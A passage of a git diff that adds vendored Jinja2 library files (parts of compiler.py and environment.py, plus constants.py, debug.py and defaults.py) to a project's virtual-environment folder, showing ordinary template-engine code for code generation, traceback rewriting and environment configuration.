self.writeline(val + ",") + else: + if frame.buffer is None: + self.writeline("yield ", item) + else: + self.newline(item) + + # A node to be evaluated at runtime. + self._output_child_pre(item, frame, finalize) + self.visit(item, frame) + self._output_child_post(item, frame, finalize) + + if frame.buffer is not None: + self.write(",") + + if frame.buffer is not None: + self.outdent() + self.writeline(")" if len(body) == 1 else "))") + + if frame.require_output_check: + self.outdent() + + def visit_Assign(self, node: nodes.Assign, frame: Frame) -> None: + self.push_assign_tracking() + self.newline(node) + self.visit(node.target, frame) + self.write(" = ") + self.visit(node.node, frame) + self.pop_assign_tracking(frame) + + def visit_AssignBlock(self, node: nodes.AssignBlock, frame: Frame) -> None: + self.push_assign_tracking() + block_frame = frame.inner() + # This is a special case. 
Since a set block always captures we + # will disable output checks. This way one can use set blocks + # toplevel even in extended templates. + block_frame.require_output_check = False + block_frame.symbols.analyze_node(node) + self.enter_frame(block_frame) + self.buffer(block_frame) + self.blockvisit(node.body, block_frame) + self.newline(node) + self.visit(node.target, frame) + self.write(" = (Markup if context.eval_ctx.autoescape else identity)(") + if node.filter is not None: + self.visit_Filter(node.filter, block_frame) + else: + self.write(f"concat({block_frame.buffer})") + self.write(")") + self.pop_assign_tracking(frame) + self.leave_frame(block_frame) + + # -- Expression Visitors + + def visit_Name(self, node: nodes.Name, frame: Frame) -> None: + if node.ctx == "store" and ( + frame.toplevel or frame.loop_frame or frame.block_frame + ): + if self._assign_stack: + self._assign_stack[-1].add(node.name) + ref = frame.symbols.ref(node.name) + + # If we are looking up a variable we might have to deal with the + # case where it's undefined. We can skip that case if the load + # instruction indicates a parameter which are always defined. + if node.ctx == "load": + load = frame.symbols.find_load(ref) + if not ( + load is not None + and load[0] == VAR_LOAD_PARAMETER + and not self.parameter_is_undeclared(ref) + ): + self.write( + f"(undefined(name={node.name!r}) if {ref} is missing else {ref})" + ) + return + + self.write(ref) + + def visit_NSRef(self, node: nodes.NSRef, frame: Frame) -> None: + # NSRefs can only be used to store values; since they use the normal + # `foo.bar` notation they will be parsed as a normal attribute access + # when used anywhere but in a `set` context + ref = frame.symbols.ref(node.name) + self.writeline(f"if not isinstance({ref}, Namespace):") + self.indent() + self.writeline( + "raise TemplateRuntimeError" + '("cannot assign attribute on non-namespace object")' + ) + self.outdent() + self.writeline(f"{ref}[{node.attr!r}]") + + def visit_Const(self, node: nodes.Const, frame: Frame) -> None: + val = node.as_const(frame.eval_ctx) + if isinstance(val, float): + self.write(str(val)) + else: + self.write(repr(val)) + + def visit_TemplateData(self, node: nodes.TemplateData, frame: Frame) -> None: + try: + self.write(repr(node.as_const(frame.eval_ctx))) + except nodes.Impossible: + self.write( + f"(Markup if context.eval_ctx.autoescape else identity)({node.data!r})" + ) + + def visit_Tuple(self, node: nodes.Tuple, frame: Frame) -> None: + self.write("(") + idx = -1 + for idx, item in enumerate(node.items): + if idx: + self.write(", ") + self.visit(item, frame) + self.write(",)" if idx == 0 else ")") + + def visit_List(self, node: nodes.List, frame: Frame) -> None: + self.write("[") + for idx, item in enumerate(node.items): + if idx: + self.write(", ") + self.visit(item, frame) + self.write("]") + + def visit_Dict(self, node: nodes.Dict, frame: Frame) -> None: + self.write("{") + for idx, item in enumerate(node.items): + if idx: + self.write(", ") + self.visit(item.key, frame) + self.write(": ") + self.visit(item.value, frame) + self.write("}") + + visit_Add = _make_binop("+") + visit_Sub = _make_binop("-") + visit_Mul = _make_binop("*") + visit_Div = _make_binop("/") + visit_FloorDiv = _make_binop("//") + visit_Pow = _make_binop("**") + visit_Mod = _make_binop("%") + visit_And = _make_binop("and") + visit_Or = _make_binop("or") + visit_Pos = _make_unop("+") + visit_Neg = _make_unop("-") + visit_Not = _make_unop("not ") + + @optimizeconst + def visit_Concat(self, node: 
nodes.Concat, frame: Frame) -> None: + if frame.eval_ctx.volatile: + func_name = "(markup_join if context.eval_ctx.volatile else str_join)" + elif frame.eval_ctx.autoescape: + func_name = "markup_join" + else: + func_name = "str_join" + self.write(f"{func_name}((") + for arg in node.nodes: + self.visit(arg, frame) + self.write(", ") + self.write("))") + + @optimizeconst + def visit_Compare(self, node: nodes.Compare, frame: Frame) -> None: + self.write("(") + self.visit(node.expr, frame) + for op in node.ops: + self.visit(op, frame) + self.write(")") + + def visit_Operand(self, node: nodes.Operand, frame: Frame) -> None: + self.write(f" {operators[node.op]} ") + self.visit(node.expr, frame) + + @optimizeconst + def visit_Getattr(self, node: nodes.Getattr, frame: Frame) -> None: + if self.environment.is_async: + self.write("(await auto_await(") + + self.write("environment.getattr(") + self.visit(node.node, frame) + self.write(f", {node.attr!r})") + + if self.environment.is_async: + self.write("))") + + @optimizeconst + def visit_Getitem(self, node: nodes.Getitem, frame: Frame) -> None: + # slices bypass the environment getitem method. + if isinstance(node.arg, nodes.Slice): + self.visit(node.node, frame) + self.write("[") + self.visit(node.arg, frame) + self.write("]") + else: + if self.environment.is_async: + self.write("(await auto_await(") + + self.write("environment.getitem(") + self.visit(node.node, frame) + self.write(", ") + self.visit(node.arg, frame) + self.write(")") + + if self.environment.is_async: + self.write("))") + + def visit_Slice(self, node: nodes.Slice, frame: Frame) -> None: + if node.start is not None: + self.visit(node.start, frame) + self.write(":") + if node.stop is not None: + self.visit(node.stop, frame) + if node.step is not None: + self.write(":") + self.visit(node.step, frame) + + @contextmanager + def _filter_test_common( + self, node: t.Union[nodes.Filter, nodes.Test], frame: Frame, is_filter: bool + ) -> t.Iterator[None]: + if self.environment.is_async: + self.write("(await auto_await(") + + if is_filter: + self.write(f"{self.filters[node.name]}(") + func = self.environment.filters.get(node.name) + else: + self.write(f"{self.tests[node.name]}(") + func = self.environment.tests.get(node.name) + + # When inside an If or CondExpr frame, allow the filter to be + # undefined at compile time and only raise an error if it's + # actually called at runtime. See pull_dependencies. + if func is None and not frame.soft_frame: + type_name = "filter" if is_filter else "test" + self.fail(f"No {type_name} named {node.name!r}.", node.lineno) + + pass_arg = { + _PassArg.context: "context", + _PassArg.eval_context: "context.eval_ctx", + _PassArg.environment: "environment", + }.get( + _PassArg.from_obj(func) # type: ignore + ) + + if pass_arg is not None: + self.write(f"{pass_arg}, ") + + # Back to the visitor function to handle visiting the target of + # the filter or test. 
+ yield + + self.signature(node, frame) + self.write(")") + + if self.environment.is_async: + self.write("))") + + @optimizeconst + def visit_Filter(self, node: nodes.Filter, frame: Frame) -> None: + with self._filter_test_common(node, frame, True): + # if the filter node is None we are inside a filter block + # and want to write to the current buffer + if node.node is not None: + self.visit(node.node, frame) + elif frame.eval_ctx.volatile: + self.write( + f"(Markup(concat({frame.buffer}))" + f" if context.eval_ctx.autoescape else concat({frame.buffer}))" + ) + elif frame.eval_ctx.autoescape: + self.write(f"Markup(concat({frame.buffer}))") + else: + self.write(f"concat({frame.buffer})") + + @optimizeconst + def visit_Test(self, node: nodes.Test, frame: Frame) -> None: + with self._filter_test_common(node, frame, False): + self.visit(node.node, frame) + + @optimizeconst + def visit_CondExpr(self, node: nodes.CondExpr, frame: Frame) -> None: + frame = frame.soft() + + def write_expr2() -> None: + if node.expr2 is not None: + self.visit(node.expr2, frame) + return + + self.write( + f'cond_expr_undefined("the inline if-expression on' + f" {self.position(node)} evaluated to false and no else" + f' section was defined.")' + ) + + self.write("(") + self.visit(node.expr1, frame) + self.write(" if ") + self.visit(node.test, frame) + self.write(" else ") + write_expr2() + self.write(")") + + @optimizeconst + def visit_Call( + self, node: nodes.Call, frame: Frame, forward_caller: bool = False + ) -> None: + if self.environment.is_async: + self.write("(await auto_await(") + if self.environment.sandboxed: + self.write("environment.call(context, ") + else: + self.write("context.call(") + self.visit(node.node, frame) + extra_kwargs = {"caller": "caller"} if forward_caller else None + loop_kwargs = {"_loop_vars": "_loop_vars"} if frame.loop_frame else {} + block_kwargs = {"_block_vars": "_block_vars"} if frame.block_frame else {} + if extra_kwargs: + extra_kwargs.update(loop_kwargs, **block_kwargs) + elif loop_kwargs or block_kwargs: + extra_kwargs = dict(loop_kwargs, **block_kwargs) + self.signature(node, frame, extra_kwargs) + self.write(")") + if self.environment.is_async: + self.write("))") + + def visit_Keyword(self, node: nodes.Keyword, frame: Frame) -> None: + self.write(node.key + "=") + self.visit(node.value, frame) + + # -- Unused nodes for extensions + + def visit_MarkSafe(self, node: nodes.MarkSafe, frame: Frame) -> None: + self.write("Markup(") + self.visit(node.expr, frame) + self.write(")") + + def visit_MarkSafeIfAutoescape( + self, node: nodes.MarkSafeIfAutoescape, frame: Frame + ) -> None: + self.write("(Markup if context.eval_ctx.autoescape else identity)(") + self.visit(node.expr, frame) + self.write(")") + + def visit_EnvironmentAttribute( + self, node: nodes.EnvironmentAttribute, frame: Frame + ) -> None: + self.write("environment." 
+ node.name) + + def visit_ExtensionAttribute( + self, node: nodes.ExtensionAttribute, frame: Frame + ) -> None: + self.write(f"environment.extensions[{node.identifier!r}].{node.name}") + + def visit_ImportedName(self, node: nodes.ImportedName, frame: Frame) -> None: + self.write(self.import_aliases[node.importname]) + + def visit_InternalName(self, node: nodes.InternalName, frame: Frame) -> None: + self.write(node.name) + + def visit_ContextReference( + self, node: nodes.ContextReference, frame: Frame + ) -> None: + self.write("context") + + def visit_DerivedContextReference( + self, node: nodes.DerivedContextReference, frame: Frame + ) -> None: + self.write(self.derive_context(frame)) + + def visit_Continue(self, node: nodes.Continue, frame: Frame) -> None: + self.writeline("continue", node) + + def visit_Break(self, node: nodes.Break, frame: Frame) -> None: + self.writeline("break", node) + + def visit_Scope(self, node: nodes.Scope, frame: Frame) -> None: + scope_frame = frame.inner() + scope_frame.symbols.analyze_node(node) + self.enter_frame(scope_frame) + self.blockvisit(node.body, scope_frame) + self.leave_frame(scope_frame) + + def visit_OverlayScope(self, node: nodes.OverlayScope, frame: Frame) -> None: + ctx = self.temporary_identifier() + self.writeline(f"{ctx} = {self.derive_context(frame)}") + self.writeline(f"{ctx}.vars = ") + self.visit(node.context, frame) + self.push_context_reference(ctx) + + scope_frame = frame.inner(isolated=True) + scope_frame.symbols.analyze_node(node) + self.enter_frame(scope_frame) + self.blockvisit(node.body, scope_frame) + self.leave_frame(scope_frame) + self.pop_context_reference() + + def visit_EvalContextModifier( + self, node: nodes.EvalContextModifier, frame: Frame + ) -> None: + for keyword in node.options: + self.writeline(f"context.eval_ctx.{keyword.key} = ") + self.visit(keyword.value, frame) + try: + val = keyword.value.as_const(frame.eval_ctx) + except nodes.Impossible: + frame.eval_ctx.volatile = True + else: + setattr(frame.eval_ctx, keyword.key, val) + + def visit_ScopedEvalContextModifier( + self, node: nodes.ScopedEvalContextModifier, frame: Frame + ) -> None: + old_ctx_name = self.temporary_identifier() + saved_ctx = frame.eval_ctx.save() + self.writeline(f"{old_ctx_name} = context.eval_ctx.save()") + self.visit_EvalContextModifier(node, frame) + for child in node.body: + self.visit(child, frame) + frame.eval_ctx.revert(saved_ctx) + self.writeline(f"context.eval_ctx.revert({old_ctx_name})") diff --git a/env/Lib/site-packages/jinja2/constants.py b/env/Lib/site-packages/jinja2/constants.py new file mode 100644 index 00000000..41a1c23b --- /dev/null +++ b/env/Lib/site-packages/jinja2/constants.py @@ -0,0 +1,20 @@ +#: list of lorem ipsum words used by the lipsum() helper function +LOREM_IPSUM_WORDS = """\ +a ac accumsan ad adipiscing aenean aliquam aliquet amet ante aptent arcu at +auctor augue bibendum blandit class commodo condimentum congue consectetuer +consequat conubia convallis cras cubilia cum curabitur curae cursus dapibus +diam dictum dictumst dignissim dis dolor donec dui duis egestas eget eleifend +elementum elit enim erat eros est et etiam eu euismod facilisi facilisis fames +faucibus felis fermentum feugiat fringilla fusce gravida habitant habitasse hac +hendrerit hymenaeos iaculis id imperdiet in inceptos integer interdum ipsum +justo lacinia lacus laoreet lectus leo libero ligula litora lobortis lorem +luctus maecenas magna magnis malesuada massa mattis mauris metus mi molestie +mollis montes morbi mus nam nascetur 
natoque nec neque netus nibh nisi nisl non +nonummy nostra nulla nullam nunc odio orci ornare parturient pede pellentesque +penatibus per pharetra phasellus placerat platea porta porttitor posuere +potenti praesent pretium primis proin pulvinar purus quam quis quisque rhoncus +ridiculus risus rutrum sagittis sapien scelerisque sed sem semper senectus sit +sociis sociosqu sodales sollicitudin suscipit suspendisse taciti tellus tempor +tempus tincidunt torquent tortor tristique turpis ullamcorper ultrices +ultricies urna ut varius vehicula vel velit venenatis vestibulum vitae vivamus +viverra volutpat vulputate""" diff --git a/env/Lib/site-packages/jinja2/debug.py b/env/Lib/site-packages/jinja2/debug.py new file mode 100644 index 00000000..7ed7e929 --- /dev/null +++ b/env/Lib/site-packages/jinja2/debug.py @@ -0,0 +1,191 @@ +import sys +import typing as t +from types import CodeType +from types import TracebackType + +from .exceptions import TemplateSyntaxError +from .utils import internal_code +from .utils import missing + +if t.TYPE_CHECKING: + from .runtime import Context + + +def rewrite_traceback_stack(source: t.Optional[str] = None) -> BaseException: + """Rewrite the current exception to replace any tracebacks from + within compiled template code with tracebacks that look like they + came from the template source. + + This must be called within an ``except`` block. + + :param source: For ``TemplateSyntaxError``, the original source if + known. + :return: The original exception with the rewritten traceback. + """ + _, exc_value, tb = sys.exc_info() + exc_value = t.cast(BaseException, exc_value) + tb = t.cast(TracebackType, tb) + + if isinstance(exc_value, TemplateSyntaxError) and not exc_value.translated: + exc_value.translated = True + exc_value.source = source + # Remove the old traceback, otherwise the frames from the + # compiler still show up. + exc_value.with_traceback(None) + # Outside of runtime, so the frame isn't executing template + # code, but it still needs to point at the template. + tb = fake_traceback( + exc_value, None, exc_value.filename or "", exc_value.lineno + ) + else: + # Skip the frame for the render function. + tb = tb.tb_next + + stack = [] + + # Build the stack of traceback object, replacing any in template + # code with the source file and line information. + while tb is not None: + # Skip frames decorated with @internalcode. These are internal + # calls that aren't useful in template debugging output. + if tb.tb_frame.f_code in internal_code: + tb = tb.tb_next + continue + + template = tb.tb_frame.f_globals.get("__jinja_template__") + + if template is not None: + lineno = template.get_corresponding_lineno(tb.tb_lineno) + fake_tb = fake_traceback(exc_value, tb, template.filename, lineno) + stack.append(fake_tb) + else: + stack.append(tb) + + tb = tb.tb_next + + tb_next = None + + # Assign tb_next in reverse to avoid circular references. + for tb in reversed(stack): + tb.tb_next = tb_next + tb_next = tb + + return exc_value.with_traceback(tb_next) + + +def fake_traceback( # type: ignore + exc_value: BaseException, tb: t.Optional[TracebackType], filename: str, lineno: int +) -> TracebackType: + """Produce a new traceback object that looks like it came from the + template source instead of the compiled code. The filename, line + number, and location name will point to the template, and the local + variables will be the current template context. + + :param exc_value: The original exception to be re-raised to create + the new traceback. 
+ :param tb: The original traceback to get the local variables and + code info from. + :param filename: The template filename. + :param lineno: The line number in the template source. + """ + if tb is not None: + # Replace the real locals with the context that would be + # available at that point in the template. + locals = get_template_locals(tb.tb_frame.f_locals) + locals.pop("__jinja_exception__", None) + else: + locals = {} + + globals = { + "__name__": filename, + "__file__": filename, + "__jinja_exception__": exc_value, + } + # Raise an exception at the correct line number. + code: CodeType = compile( + "\n" * (lineno - 1) + "raise __jinja_exception__", filename, "exec" + ) + + # Build a new code object that points to the template file and + # replaces the location with a block name. + location = "template" + + if tb is not None: + function = tb.tb_frame.f_code.co_name + + if function == "root": + location = "top-level template code" + elif function.startswith("block_"): + location = f"block {function[6:]!r}" + + if sys.version_info >= (3, 8): + code = code.replace(co_name=location) + else: + code = CodeType( + code.co_argcount, + code.co_kwonlyargcount, + code.co_nlocals, + code.co_stacksize, + code.co_flags, + code.co_code, + code.co_consts, + code.co_names, + code.co_varnames, + code.co_filename, + location, + code.co_firstlineno, + code.co_lnotab, + code.co_freevars, + code.co_cellvars, + ) + + # Execute the new code, which is guaranteed to raise, and return + # the new traceback without this frame. + try: + exec(code, globals, locals) + except BaseException: + return sys.exc_info()[2].tb_next # type: ignore + + +def get_template_locals(real_locals: t.Mapping[str, t.Any]) -> t.Dict[str, t.Any]: + """Based on the runtime locals, get the context that would be + available at that point in the template. + """ + # Start with the current template context. + ctx: "t.Optional[Context]" = real_locals.get("context") + + if ctx is not None: + data: t.Dict[str, t.Any] = ctx.get_all().copy() + else: + data = {} + + # Might be in a derived context that only sets local variables + # rather than pushing a context. Local variables follow the scheme + # l_depth_name. Find the highest-depth local that has a value for + # each name. + local_overrides: t.Dict[str, t.Tuple[int, t.Any]] = {} + + for name, value in real_locals.items(): + if not name.startswith("l_") or value is missing: + # Not a template variable, or no longer relevant. + continue + + try: + _, depth_str, name = name.split("_", 2) + depth = int(depth_str) + except ValueError: + continue + + cur_depth = local_overrides.get(name, (-1,))[0] + + if cur_depth < depth: + local_overrides[name] = (depth, value) + + # Modify the context with any derived context. 
+ for name, (_, value) in local_overrides.items(): + if value is missing: + data.pop(name, None) + else: + data[name] = value + + return data diff --git a/env/Lib/site-packages/jinja2/defaults.py b/env/Lib/site-packages/jinja2/defaults.py new file mode 100644 index 00000000..638cad3d --- /dev/null +++ b/env/Lib/site-packages/jinja2/defaults.py @@ -0,0 +1,48 @@ +import typing as t + +from .filters import FILTERS as DEFAULT_FILTERS # noqa: F401 +from .tests import TESTS as DEFAULT_TESTS # noqa: F401 +from .utils import Cycler +from .utils import generate_lorem_ipsum +from .utils import Joiner +from .utils import Namespace + +if t.TYPE_CHECKING: + import typing_extensions as te + +# defaults for the parser / lexer +BLOCK_START_STRING = "{%" +BLOCK_END_STRING = "%}" +VARIABLE_START_STRING = "{{" +VARIABLE_END_STRING = "}}" +COMMENT_START_STRING = "{#" +COMMENT_END_STRING = "#}" +LINE_STATEMENT_PREFIX: t.Optional[str] = None +LINE_COMMENT_PREFIX: t.Optional[str] = None +TRIM_BLOCKS = False +LSTRIP_BLOCKS = False +NEWLINE_SEQUENCE: "te.Literal['\\n', '\\r\\n', '\\r']" = "\n" +KEEP_TRAILING_NEWLINE = False + +# default filters, tests and namespace + +DEFAULT_NAMESPACE = { + "range": range, + "dict": dict, + "lipsum": generate_lorem_ipsum, + "cycler": Cycler, + "joiner": Joiner, + "namespace": Namespace, +} + +# default policies +DEFAULT_POLICIES: t.Dict[str, t.Any] = { + "compiler.ascii_str": True, + "urlize.rel": "noopener", + "urlize.target": None, + "urlize.extra_schemes": None, + "truncate.leeway": 5, + "json.dumps_function": None, + "json.dumps_kwargs": {"sort_keys": True}, + "ext.i18n.trimmed": False, +} diff --git a/env/Lib/site-packages/jinja2/environment.py b/env/Lib/site-packages/jinja2/environment.py new file mode 100644 index 00000000..ea04e8b4 --- /dev/null +++ b/env/Lib/site-packages/jinja2/environment.py @@ -0,0 +1,1667 @@ +"""Classes for managing templates and their runtime and compile time +options. +""" +import os +import typing +import typing as t +import weakref +from collections import ChainMap +from functools import lru_cache +from functools import partial +from functools import reduce +from types import CodeType + +from markupsafe import Markup + +from . 
import nodes +from .compiler import CodeGenerator +from .compiler import generate +from .defaults import BLOCK_END_STRING +from .defaults import BLOCK_START_STRING +from .defaults import COMMENT_END_STRING +from .defaults import COMMENT_START_STRING +from .defaults import DEFAULT_FILTERS +from .defaults import DEFAULT_NAMESPACE +from .defaults import DEFAULT_POLICIES +from .defaults import DEFAULT_TESTS +from .defaults import KEEP_TRAILING_NEWLINE +from .defaults import LINE_COMMENT_PREFIX +from .defaults import LINE_STATEMENT_PREFIX +from .defaults import LSTRIP_BLOCKS +from .defaults import NEWLINE_SEQUENCE +from .defaults import TRIM_BLOCKS +from .defaults import VARIABLE_END_STRING +from .defaults import VARIABLE_START_STRING +from .exceptions import TemplateNotFound +from .exceptions import TemplateRuntimeError +from .exceptions import TemplatesNotFound +from .exceptions import TemplateSyntaxError +from .exceptions import UndefinedError +from .lexer import get_lexer +from .lexer import Lexer +from .lexer import TokenStream +from .nodes import EvalContext +from .parser import Parser +from .runtime import Context +from .runtime import new_context +from .runtime import Undefined +from .utils import _PassArg +from .utils import concat +from .utils import consume +from .utils import import_string +from .utils import internalcode +from .utils import LRUCache +from .utils import missing + +if t.TYPE_CHECKING: + import typing_extensions as te + from .bccache import BytecodeCache + from .ext import Extension + from .loaders import BaseLoader + +_env_bound = t.TypeVar("_env_bound", bound="Environment") + + +# for direct template usage we have up to ten living environments +@lru_cache(maxsize=10) +def get_spontaneous_environment(cls: t.Type[_env_bound], *args: t.Any) -> _env_bound: + """Return a new spontaneous environment. A spontaneous environment + is used for templates created directly rather than through an + existing environment. + + :param cls: Environment class to create. + :param args: Positional arguments passed to environment. + """ + env = cls(*args) + env.shared = True + return env + + +def create_cache( + size: int, +) -> t.Optional[t.MutableMapping[t.Tuple[weakref.ref, str], "Template"]]: + """Return the cache class for the given size.""" + if size == 0: + return None + + if size < 0: + return {} + + return LRUCache(size) # type: ignore + + +def copy_cache( + cache: t.Optional[t.MutableMapping], +) -> t.Optional[t.MutableMapping[t.Tuple[weakref.ref, str], "Template"]]: + """Create an empty copy of the given cache.""" + if cache is None: + return None + + if type(cache) is dict: + return {} + + return LRUCache(cache.capacity) # type: ignore + + +def load_extensions( + environment: "Environment", + extensions: t.Sequence[t.Union[str, t.Type["Extension"]]], +) -> t.Dict[str, "Extension"]: + """Load the extensions from the list and bind it to the environment. + Returns a dict of instantiated extensions. + """ + result = {} + + for extension in extensions: + if isinstance(extension, str): + extension = t.cast(t.Type["Extension"], import_string(extension)) + + result[extension.identifier] = extension(environment) + + return result + + +def _environment_config_check(environment: "Environment") -> "Environment": + """Perform a sanity check on the environment.""" + assert issubclass( + environment.undefined, Undefined + ), "'undefined' must be a subclass of 'jinja2.Undefined'." 
+ assert ( + environment.block_start_string + != environment.variable_start_string + != environment.comment_start_string + ), "block, variable and comment start strings must be different." + assert environment.newline_sequence in { + "\r", + "\r\n", + "\n", + }, "'newline_sequence' must be one of '\\n', '\\r\\n', or '\\r'." + return environment + + +class Environment: + r"""The core component of Jinja is the `Environment`. It contains + important shared variables like configuration, filters, tests, + globals and others. Instances of this class may be modified if + they are not shared and if no template was loaded so far. + Modifications on environments after the first template was loaded + will lead to surprising effects and undefined behavior. + + Here are the possible initialization parameters: + + `block_start_string` + The string marking the beginning of a block. Defaults to ``'{%'``. + + `block_end_string` + The string marking the end of a block. Defaults to ``'%}'``. + + `variable_start_string` + The string marking the beginning of a print statement. + Defaults to ``'{{'``. + + `variable_end_string` + The string marking the end of a print statement. Defaults to + ``'}}'``. + + `comment_start_string` + The string marking the beginning of a comment. Defaults to ``'{#'``. + + `comment_end_string` + The string marking the end of a comment. Defaults to ``'#}'``. + + `line_statement_prefix` + If given and a string, this will be used as prefix for line based + statements. See also :ref:`line-statements`. + + `line_comment_prefix` + If given and a string, this will be used as prefix for line based + comments. See also :ref:`line-statements`. + + .. versionadded:: 2.2 + + `trim_blocks` + If this is set to ``True`` the first newline after a block is + removed (block, not variable tag!). Defaults to `False`. + + `lstrip_blocks` + If this is set to ``True`` leading spaces and tabs are stripped + from the start of a line to a block. Defaults to `False`. + + `newline_sequence` + The sequence that starts a newline. Must be one of ``'\r'``, + ``'\n'`` or ``'\r\n'``. The default is ``'\n'`` which is a + useful default for Linux and OS X systems as well as web + applications. + + `keep_trailing_newline` + Preserve the trailing newline when rendering templates. + The default is ``False``, which causes a single newline, + if present, to be stripped from the end of the template. + + .. versionadded:: 2.7 + + `extensions` + List of Jinja extensions to use. This can either be import paths + as strings or extension classes. For more information have a + look at :ref:`the extensions documentation `. + + `optimized` + should the optimizer be enabled? Default is ``True``. + + `undefined` + :class:`Undefined` or a subclass of it that is used to represent + undefined values in the template. + + `finalize` + A callable that can be used to process the result of a variable + expression before it is output. For example one can convert + ``None`` implicitly into an empty string here. + + `autoescape` + If set to ``True`` the XML/HTML autoescaping feature is enabled by + default. For more details about autoescaping see + :class:`~markupsafe.Markup`. As of Jinja 2.4 this can also + be a callable that is passed the template name and has to + return ``True`` or ``False`` depending on autoescape should be + enabled by default. + + .. versionchanged:: 2.4 + `autoescape` can now be a function + + `loader` + The template loader for this environment. + + `cache_size` + The size of the cache. 
Per default this is ``400`` which means + that if more than 400 templates are loaded the loader will clean + out the least recently used template. If the cache size is set to + ``0`` templates are recompiled all the time, if the cache size is + ``-1`` the cache will not be cleaned. + + .. versionchanged:: 2.8 + The cache size was increased to 400 from a low 50. + + `auto_reload` + Some loaders load templates from locations where the template + sources may change (ie: file system or database). If + ``auto_reload`` is set to ``True`` (default) every time a template is + requested the loader checks if the source changed and if yes, it + will reload the template. For higher performance it's possible to + disable that. + + `bytecode_cache` + If set to a bytecode cache object, this object will provide a + cache for the internal Jinja bytecode so that templates don't + have to be parsed if they were not changed. + + See :ref:`bytecode-cache` for more information. + + `enable_async` + If set to true this enables async template execution which + allows using async functions and generators. + """ + + #: if this environment is sandboxed. Modifying this variable won't make + #: the environment sandboxed though. For a real sandboxed environment + #: have a look at jinja2.sandbox. This flag alone controls the code + #: generation by the compiler. + sandboxed = False + + #: True if the environment is just an overlay + overlayed = False + + #: the environment this environment is linked to if it is an overlay + linked_to: t.Optional["Environment"] = None + + #: shared environments have this set to `True`. A shared environment + #: must not be modified + shared = False + + #: the class that is used for code generation. See + #: :class:`~jinja2.compiler.CodeGenerator` for more information. + code_generator_class: t.Type["CodeGenerator"] = CodeGenerator + + concat = "".join + + #: the context class that is used for templates. See + #: :class:`~jinja2.runtime.Context` for more information. + context_class: t.Type[Context] = Context + + template_class: t.Type["Template"] + + def __init__( + self, + block_start_string: str = BLOCK_START_STRING, + block_end_string: str = BLOCK_END_STRING, + variable_start_string: str = VARIABLE_START_STRING, + variable_end_string: str = VARIABLE_END_STRING, + comment_start_string: str = COMMENT_START_STRING, + comment_end_string: str = COMMENT_END_STRING, + line_statement_prefix: t.Optional[str] = LINE_STATEMENT_PREFIX, + line_comment_prefix: t.Optional[str] = LINE_COMMENT_PREFIX, + trim_blocks: bool = TRIM_BLOCKS, + lstrip_blocks: bool = LSTRIP_BLOCKS, + newline_sequence: "te.Literal['\\n', '\\r\\n', '\\r']" = NEWLINE_SEQUENCE, + keep_trailing_newline: bool = KEEP_TRAILING_NEWLINE, + extensions: t.Sequence[t.Union[str, t.Type["Extension"]]] = (), + optimized: bool = True, + undefined: t.Type[Undefined] = Undefined, + finalize: t.Optional[t.Callable[..., t.Any]] = None, + autoescape: t.Union[bool, t.Callable[[t.Optional[str]], bool]] = False, + loader: t.Optional["BaseLoader"] = None, + cache_size: int = 400, + auto_reload: bool = True, + bytecode_cache: t.Optional["BytecodeCache"] = None, + enable_async: bool = False, + ): + # !!Important notice!! + # The constructor accepts quite a few arguments that should be + # passed by keyword rather than position. 
However it's important to + # not change the order of arguments because it's used at least + # internally in those cases: + # - spontaneous environments (i18n extension and Template) + # - unittests + # If parameter changes are required only add parameters at the end + # and don't change the arguments (or the defaults!) of the arguments + # existing already. + + # lexer / parser information + self.block_start_string = block_start_string + self.block_end_string = block_end_string + self.variable_start_string = variable_start_string + self.variable_end_string = variable_end_string + self.comment_start_string = comment_start_string + self.comment_end_string = comment_end_string + self.line_statement_prefix = line_statement_prefix + self.line_comment_prefix = line_comment_prefix + self.trim_blocks = trim_blocks + self.lstrip_blocks = lstrip_blocks + self.newline_sequence = newline_sequence + self.keep_trailing_newline = keep_trailing_newline + + # runtime information + self.undefined: t.Type[Undefined] = undefined + self.optimized = optimized + self.finalize = finalize + self.autoescape = autoescape + + # defaults + self.filters = DEFAULT_FILTERS.copy() + self.tests = DEFAULT_TESTS.copy() + self.globals = DEFAULT_NAMESPACE.copy() + + # set the loader provided + self.loader = loader + self.cache = create_cache(cache_size) + self.bytecode_cache = bytecode_cache + self.auto_reload = auto_reload + + # configurable policies + self.policies = DEFAULT_POLICIES.copy() + + # load extensions + self.extensions = load_extensions(self, extensions) + + self.is_async = enable_async + _environment_config_check(self) + + def add_extension(self, extension: t.Union[str, t.Type["Extension"]]) -> None: + """Adds an extension after the environment was created. + + .. versionadded:: 2.5 + """ + self.extensions.update(load_extensions(self, [extension])) + + def extend(self, **attributes: t.Any) -> None: + """Add the items to the instance of the environment if they do not exist + yet. This is used by :ref:`extensions ` to register + callbacks and configuration values without breaking inheritance. + """ + for key, value in attributes.items(): + if not hasattr(self, key): + setattr(self, key, value) + + def overlay( + self, + block_start_string: str = missing, + block_end_string: str = missing, + variable_start_string: str = missing, + variable_end_string: str = missing, + comment_start_string: str = missing, + comment_end_string: str = missing, + line_statement_prefix: t.Optional[str] = missing, + line_comment_prefix: t.Optional[str] = missing, + trim_blocks: bool = missing, + lstrip_blocks: bool = missing, + newline_sequence: "te.Literal['\\n', '\\r\\n', '\\r']" = missing, + keep_trailing_newline: bool = missing, + extensions: t.Sequence[t.Union[str, t.Type["Extension"]]] = missing, + optimized: bool = missing, + undefined: t.Type[Undefined] = missing, + finalize: t.Optional[t.Callable[..., t.Any]] = missing, + autoescape: t.Union[bool, t.Callable[[t.Optional[str]], bool]] = missing, + loader: t.Optional["BaseLoader"] = missing, + cache_size: int = missing, + auto_reload: bool = missing, + bytecode_cache: t.Optional["BytecodeCache"] = missing, + enable_async: bool = False, + ) -> "Environment": + """Create a new overlay environment that shares all the data with the + current environment except for cache and the overridden attributes. + Extensions cannot be removed for an overlayed environment. 
An overlayed
+        environment automatically gets all the extensions of the environment it
+        is linked to plus optional extra extensions.
+
+        Creating overlays should happen after the initial environment was set
+        up completely. Not all attributes are truly linked, some are just
+        copied over so modifications on the original environment may not shine
+        through.
+
+        .. versionchanged:: 3.1.2
+            Added the ``newline_sequence``, ``keep_trailing_newline``,
+            and ``enable_async`` parameters to match ``__init__``.
+        """
+        args = dict(locals())
+        del args["self"], args["cache_size"], args["extensions"], args["enable_async"]
+
+        rv = object.__new__(self.__class__)
+        rv.__dict__.update(self.__dict__)
+        rv.overlayed = True
+        rv.linked_to = self
+
+        for key, value in args.items():
+            if value is not missing:
+                setattr(rv, key, value)
+
+        if cache_size is not missing:
+            rv.cache = create_cache(cache_size)
+        else:
+            rv.cache = copy_cache(self.cache)
+
